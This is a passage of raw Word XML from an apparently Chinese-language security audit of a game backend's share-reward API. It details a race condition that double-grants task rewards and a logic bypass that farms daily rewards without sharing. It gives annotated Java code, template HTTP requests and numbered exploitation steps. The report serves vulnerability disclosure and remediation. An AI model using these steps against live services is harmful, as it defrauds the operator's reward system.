          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType=level2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），此处不重复展开。</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入口：ShareController.java</w:t>
              <w:br/>
              <w:t>// ShareCompleteForm 字段（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Long inviterUserId;    ← 传入时须与 Token 一致，控制器已校验</w:t>
              <w:br/>
              <w:t>//   Long inviteeUserId;    ← 完全攻击者可控</w:t>
              <w:br/>
              <w:t>//   String shareType;      ← 完全攻击者可控（"level3" / "level2"）</w:t>
              <w:br/>
              <w:t>@PostMapping("/complete")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; shareComplete(@CurrentUserId Long userId,   // ← userId 来自 Token，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                       @RequestBody ShareCompleteForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (form.getInviterUserId() != null &amp;&amp; !form.getInviterUserId().equals(userId)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("inviterUserId 须与当前登录用户一致");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    shareService.shareComplete(userId, form.getInviteeUserId(), form.getShareType()); // ← inviteeUserId 和 shareType 污点传入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 路由：ShareService.java</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void shareComplete(Long currentUserId, Long inviteeUserId, String shareType) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String type = shareType != null ? shareType.trim().toLowerCase() : "";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("level3".equals(type)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        shareLevel3Success(currentUserId, inviteeUserId); // ← 进入 level3 路径，无用户行锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("level2".equals(type)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        shareLevel2Success(currentUserId, inviteeUserId); // ← 进入 level2 路径，同样无用户行锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：ShareService.java — shareLevel3Success</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void shareLevel3Success(Long inviterUserId, Long inviteeUserId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User invitee = requireInviteeOfInviter(inviterUserId, inviteeUserId);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (invitee.getIsKycVerified() == null</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> || invitee.getIsKycVerified() != 1) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("用户不存在或用户未完成KYC认证");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // FOR UPDATE + 已处理则 return，防重复 unlockSlot/updateProgress 刷任务奖励</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Optional&lt;UserInvitationRecord&gt; existingOpt =</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userInvitationRecordRepository.findByInviterUserIdAndInviteeUserIdForUpdate(inviterUserId, inviteeUserId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 关键缺陷：记录不存在时 FOR UPDATE 不产生任何行锁，两并发事务均得到 Optional.empty()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (existingOpt.isPresent() &amp;&amp; Integer.valueOf(1).equals(existingOpt.get().getIsKycCompleted())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        minerService.unlockSlot(inviterUserId, 9, 3);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return; // ← 早返回仅在记录已存在时生效</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ 两个并发事务均会执行到此处</w:t>
              <w:br/>
              <w:t xml:space="preserve">    minerService.unlockSlot(inviterUserId, 9, 3);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.updateProgress(inviterUserId, "3", 1); // ← 漏洞点：被并发调用两次，任务进度/道具奖励双发</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userInvitationRecordRepository.save(record);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 若 (inviterUserId, inviteeUserId) 无唯一约束，两条记录均被插入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    //   若有唯一约束，第二事务在 save 时抛异常回滚——但 updateProgress 若已写入非同源存储（Redis/消息队列/外部任务系统），则不回滚</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对比：`applyDailyOrLevel1Share` 的正确做法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@Transactional</w:t>
              <w:br/>
              <w:t>public void applyDailyOrLevel1Share(Long inviterUserId, Long inviteeUserId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.findByIdForUpdate(inviterUserId)  // ← 锁定始终存在的 User 行，保护完整</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("邀请用户不存在"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (dailyTaskCompleteRecordRepository.existsByUserIdAndCompleteDateAndTriggerCondition(...)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.updateProgress(inviterUserId, "1", 1); // ← 在 User 行锁保护下，不存在并发双调用问题</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以下两个请求需在毫秒级内并发发送（同一账号、同一 KYC 已认证的 inviteeUserId）：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&lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效_token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;valid_app_key&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign_1_for_nonce_1&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"inviteeUserId": &lt;KYC已认证的真实被邀请人ID&gt;, "shareType": "level3"}</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&lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效_token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;valid_app_key&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_2&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign_2_for_nonce_2&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"inviteeUserId": &lt;KYC已认证的真实被邀请人ID&gt;, "shareType": "level3"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 拦截 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/share/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，每个请求需携带独立 nonce 和对应签名。若 sign 验证在当前环境已禁用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>properties.isEnabled()=false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），则去掉签名相关头部即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者以自己账号登录，获取有效 Bearer Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>确认存在一个 KYC 已认证的被邀请人（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviteeUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），且该 inviter+invitee 组合在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserInvitationRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中尚无记录（首次 level3 调用）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用并发工具（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">、Burp Suite Turbo Intruder）在同一时间窗口内发送两个或更多完全相同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType=level3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若竞态条件触发成功，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress(inviterUserId, "3", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被调用两次：任务 triggerCondition="3" 的进度增加 2 而非 1，任务系统自动触发两次道具发放</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType=level2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 重复上述步骤可获得 triggerCondition="2" 的重复奖励</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：攻击者获得双倍任务进度推进，若任务进度满足奖励阈值的倍数则可多次触发道具奖励发放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通登录用户；需要一个满足 level3（KYC 已认证）或 level2（已注册）条件的真实被邀请人账号配合</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06"/>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ShareService.java.applyDailyOrLevel1Share → UserRepository.java.findByIdForUpdate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audit_m193_776_shareComplete_ctrl-path4of23.md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：ShareService.java#applyDailyOrLevel1Share</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_42" w:id="42"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞41：业务逻辑绕过 — 无需真实分享行为即可每日刷取任务奖励与矿机坑位解锁</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="907"/>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：日常分享任务奖励无真实性校验绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="908"/>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src/main/java/com/gameBack/mjservice/service/ShareService.java:applyDailyOrLevel1Share</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="909"/>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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="910"/>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911"/>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：普通用户（需登录 Token）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="912"/>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applyDailyOrLevel1Share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在处理 daily/level1 路径时，对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviteeUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的唯一约束仅为"不等于自己"（自邀检测），没有对其做任何真实性校验——既不验证该 userId 在数据库中是否存在，也不验证其与调用方（inviterUserId）之间是否存在合法的邀请关系（对比之下，level2/level3 路径均调用了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>requireLevel2Invitee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>requireInviteeOfInviter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 做关系校验）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">任何已认证用户均可直接向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/share/complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 提交 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType=null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>"daily"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>"level1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviteeUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为任意非己值（甚至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），即可触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress(inviterUserId, "1", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerService.unlockSlot(inviterUserId, 7, 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无需实际执行任何分享动作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">虽然 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>dailyTaskCompleteRecordRepository.existsByUserIdAndCompleteDateAndTriggerCondition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 做了每日去重保护，但仅限制"每日调用一次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"；对矿机 7 号坑位解锁而言，该接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
